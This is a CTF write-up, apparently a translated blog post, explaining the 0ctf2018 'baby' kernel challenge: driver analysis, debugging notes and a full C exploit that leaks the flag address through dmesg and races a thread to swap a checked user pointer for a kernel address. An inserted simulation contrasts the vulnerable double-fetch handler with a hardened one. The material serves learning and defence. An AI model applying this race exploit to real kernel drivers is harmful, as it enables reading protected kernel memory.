Kernel PWN learning (4) -- double fetch & 0ctf2018 baby
2022-04-23 09:28:00 【azraelxuemo】
In fact, the challenge is not complicated: it is a very simple race condition.
Challenge
The attachment
In fact, you only need to download the .tar.gz
Attachment analysis
Don't be fooled by the name, it is just a tar archive.
The core.cpio inside is not compressed, so we just need to unpack it.
The exp, exp.c, core.cpio and fs.sh inside can be deleted.
fs.sh just helps us generate the cpio.
Analysis of init
Here you can see that the driver is baby.ko, and it is reached by opening /dev/baby. There is nothing else to note, except that dmesg_restrict is not enabled, so we can run dmesg and read the printk output.
Then repack core.cpio.
Analysis of start.sh
SMAP protection is not enabled, i.e. kernel mode can directly access user-mode data.
The machine is configured with more than one core and thread, so a race condition can be triggered. To make debugging possible, we add -s.
Analysis of the driver
There are not many functions in it; the last three are useless, so the first three are the ones that matter.
ioctl
I don't know what happened here, I think the decompilation is off, but v2 is our third argument.
This means that when we call ioctl(fd, a2, a3), it directly calls
sub_25(fd, a2, a3), so let's analyze sub_25.
sub_25
Two functions
The first function leaks the kernel address of the flag. The format string used here is %p, that is the address where the flag is stored, which you can see is the address of aFlagThisWillbe.
It holds our final flag.
This is the second function.
chk_range_not_ok
This is actually
return upper_limit < (addr + offset)
Let's see what the upper limit means.
Here, let's have a look through debugging.
Very simple test code:
```c
#include <sys/ioctl.h>
#include <fcntl.h>
#include <unistd.h>

int main(){
    int fd = open("/dev/baby", O_RDWR);   /* 2 == O_RDWR */
    int a = 2;
    ioctl(fd, 0x1337, &a);                /* hit the 0x1337 branch so we can break on it */
    close(fd);
}
```
Here's a question I hope someone more experienced can answer.
Generally we find the load address of the module this way, but here that is obviously wrong.
I found the address here instead.
The modified init: because the flag is hard-coded in the driver, I also deleted the test flag.
rax is assigned current_task.
The value of rdx is as above; it looks familiar, and yes, this is the highest address of user space. So through debugging we found that *(_QWORD *)(__readgsqword((unsigned int)&current_task) + 4952)
is the highest address of user space.
Then combine this with the concrete content of the if. To satisfy the if:
command == 0x1337
upper_limit >= incoming address + 16
upper_limit >= *(_QWORD *)(incoming address) + (DWORD)*(incoming address + 8), i.e. the pointer stored at the incoming address plus the length stored 8 bytes after it
These two comparisons actually mean that what we pass in is the address of a structure:
```c
struct flag_object{
    long flag_addr;
    long length;
};
```
So the first upper-limit comparison checks whether the address of the structure we pass in lies in user space.
The second checks whether our flag buffer lies in user space.
Because what is passed in is a pointer, we can race it: after it has passed the if check, we change the structure's flag_addr to the kernel address.
The length must also match: strlen excludes the \0, so it is 33.
At the same time it compares the flag byte by byte; if it differs nothing happens, if it matches it prints. So the only option is to modify the pointer through the race.
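The check-then-use pattern just described, as an added example that is not code from the original post or from the challenge driver: a user-space C simulation with a toy flat address space (USER_LIMIT, REQ_ADDR, FAKE_ADDR, KFLAG_ADDR and the sample flag are all constructed here, not values from the challenge). It places a handler that re-reads the user struct after validating it next to a hardened handler that copies the struct once and only ever uses the kernel copy, and it also makes the range check overflow-safe so that addr + len wrapping around cannot slip past the limit.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Toy flat address space standing in for the guest's memory (assumed layout,
 * not the driver's): offsets below USER_LIMIT are "user" memory, offsets
 * above it are "kernel" memory. */
#define MEM_SIZE    0x2000ULL
#define USER_LIMIT  0x1000ULL
#define REQ_ADDR    0x100ULL     /* where user space places struct flag_object */
#define FAKE_ADDR   0x200ULL     /* user buffer holding "fake" */
#define KFLAG_ADDR  0x1800ULL    /* where the "kernel" keeps the flag */

static uint8_t mem[MEM_SIZE];
/* Constructed sample flag, 33 characters like the one in the writeup. */
static const char KERNEL_FLAG[] = "flag{constructed_sample_33chars_}";

struct flag_object {            /* layout from the writeup */
    uint64_t flag_addr;
    uint64_t length;
};

/* Models a kernel read of user memory (get_user/copy_from_user). Every call
 * is one fetch; the bug is in how many times the handler fetches the struct. */
static void fetch_user(uint64_t addr, void *dst, size_t n)
{
    memcpy(dst, &mem[addr], n);
}

/* The range check from the writeup (limit < addr + len), made overflow-safe:
 * a wrapped addr + len is rejected instead of accidentally passing. */
static bool range_ok(uint64_t addr, uint64_t len, uint64_t limit)
{
    uint64_t end;
    if (__builtin_add_overflow(addr, len, &end))
        return false;
    return end <= limit;
}

typedef void (*race_hook)(void);   /* stands in for the racing user thread */

/* Vulnerable: validates the user struct, then re-reads it for the comparison. */
static int handler_double_fetch(uint64_t req_addr, race_hook racer)
{
    struct flag_object chk, use;
    if (!range_ok(req_addr, sizeof chk, USER_LIMIT)) return -1;
    fetch_user(req_addr, &chk, sizeof chk);                /* fetch #1: for the check */
    if (!range_ok(chk.flag_addr, chk.length, USER_LIMIT)) return -1;
    if (racer) racer();                                    /* window between check and use */
    fetch_user(req_addr, &use, sizeof use);                /* fetch #2: pointer trusted blindly */
    if (use.length != strlen(KERNEL_FLAG)) return -1;
    if (use.flag_addr + use.length > MEM_SIZE) return -1;  /* toy-only guard for the array */
    return memcmp(&mem[use.flag_addr], KERNEL_FLAG, use.length) == 0; /* 1 == "print the flag" */
}

/* Hardened: copies the struct once and only ever uses that kernel copy, so a
 * concurrent rewrite of the user struct cannot change what was validated. */
static int handler_single_fetch(uint64_t req_addr, race_hook racer)
{
    struct flag_object req;
    char buf[64];
    if (!range_ok(req_addr, sizeof req, USER_LIMIT)) return -1;
    fetch_user(req_addr, &req, sizeof req);                /* the only fetch of the struct */
    if (!range_ok(req.flag_addr, req.length, USER_LIMIT)) return -1;
    if (req.length != strlen(KERNEL_FLAG) || req.length > sizeof buf) return -1;
    if (racer) racer();                                    /* same window, now harmless */
    fetch_user(req.flag_addr, buf, req.length);            /* one copy, from the validated pointer */
    return memcmp(buf, KERNEL_FLAG, req.length) == 0;
}

static void reset_memory(void)
{
    struct flag_object req = { FAKE_ADDR, strlen(KERNEL_FLAG) };
    memset(mem, 0, sizeof mem);
    memcpy(&mem[KFLAG_ADDR], KERNEL_FLAG, strlen(KERNEL_FLAG));
    memcpy(&mem[REQ_ADDR], &req, sizeof req);
    memcpy(&mem[FAKE_ADDR], "fake", 4);
}

/* What the writeup's second thread does: swap the pointer after the check. */
static void racer_swaps_pointer(void)
{
    uint64_t kaddr = KFLAG_ADDR;
    memcpy(&mem[REQ_ADDR], &kaddr, sizeof kaddr);          /* overwrite flag_addr in place */
}

/* Returns 1 if the handler "printed" the flag, 0 if the compare failed,
 * -1 if the request was rejected by the range checks. */
int run_handler(bool hardened, bool race)
{
    reset_memory();
    race_hook hook = race ? racer_swaps_pointer : NULL;
    return hardened ? handler_single_fetch(REQ_ADDR, hook)
                    : handler_double_fetch(REQ_ADDR, hook);
}

/* A request that points straight at kernel memory is rejected by both. */
int run_direct_kernel_pointer(bool hardened)
{
    struct flag_object req = { KFLAG_ADDR, strlen(KERNEL_FLAG) };
    reset_memory();
    memcpy(&mem[REQ_ADDR], &req, sizeof req);
    return hardened ? handler_single_fetch(REQ_ADDR, NULL)
                    : handler_double_fetch(REQ_ADDR, NULL);
}

int main(void)
{
    printf("double fetch, no race : %d\n", run_handler(false, false));
    printf("double fetch, race    : %d\n", run_handler(false, true));
    printf("single fetch, race    : %d\n", run_handler(true, true));
    return 0;
}
```

The race hook fires deterministically inside the check-to-use window, which is why the simulation is repeatable where the real exploit has to loop thousands of times; the hardened handler is unaffected because nothing after the check reads the user struct again.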
Attack
Leak the flag address
Because printk output only shows up in the kernel log, we need to check dmesg after performing the corresponding operation; of course dmesg_restrict=0 here, so an ordinary user can see it too. Then comes the comparison plus the assignment.
Construct our flag structure.
Write the subfunction that changes the flag address.
finish is a flag: after we have sent enough requests in main, we set it to 1.
Exploit
```c
#include <sys/ioctl.h>
#include <fcntl.h>
#include <unistd.h>
#include <pthread.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>

long flag_addr;

/* Trigger the 0x6666 command so the driver printk()s the flag address,
 * then pull it back out of dmesg (dmesg_restrict is 0 on this box). */
void get_kernel_flag_addr(int fd){
    ioctl(fd, 0x6666, 1);
    system("dmesg|tail >/tmp/1.txt");
    FILE *fd1 = fopen("/tmp/1.txt", "r");
    char buf[120];
    while (fgets(buf, 120, fd1)) {
        if (strstr(buf, "Your flag is at")) {
            char hex[17];
            strncpy(hex, buf + 31, 16);
            hex[16] = '\0';              /* strncpy does not terminate a full 16-byte copy */
            sscanf(hex, "%lx", &flag_addr);
            break;
        }
    }
    fclose(fd1);
}

struct flag_structure{
    long addr;
    long len;
};

char fake_flag[] = "fake";
volatile int finish = 0;      /* set by main() once enough requests have been sent */

/* Thread body: keep rewriting the pointer with the kernel flag address so that
 * sometimes the write lands between the driver's check and its use. */
void *chang_flag_addr(void *arg){
    struct flag_structure *s = arg;
    while (finish == 0) {
        s->addr = flag_addr;  /* change to the kernel flag address; this is the racing write */
    }
    return NULL;
}

int main(){
    int fd = open("/dev/baby", O_RDWR);
    get_kernel_flag_addr(fd);
    struct flag_structure flag;
    flag.addr = (long)fake_flag;
    flag.len = 33;
    pthread_t p1;
    /* first param is the pthread object, second NULL for default attrs,
     * third the start routine, fourth its argument */
    pthread_create(&p1, NULL, chang_flag_addr, &flag);
    for (int i = 0; i < 10000; i++) {
        ioctl(fd, 0x1337, &flag);
        flag.addr = (long)fake_flag;  /* reset to user space, otherwise the if check fails */
    }
    finish = 1;
    pthread_join(p1, NULL);
    system("dmesg|grep flag{");
    close(fd);
}
```
Copyright notice
This article was written by [azraelxuemo]; please include the original link when reposting. Thanks.
https://yzsam.com/2022/04/202204230924486081.html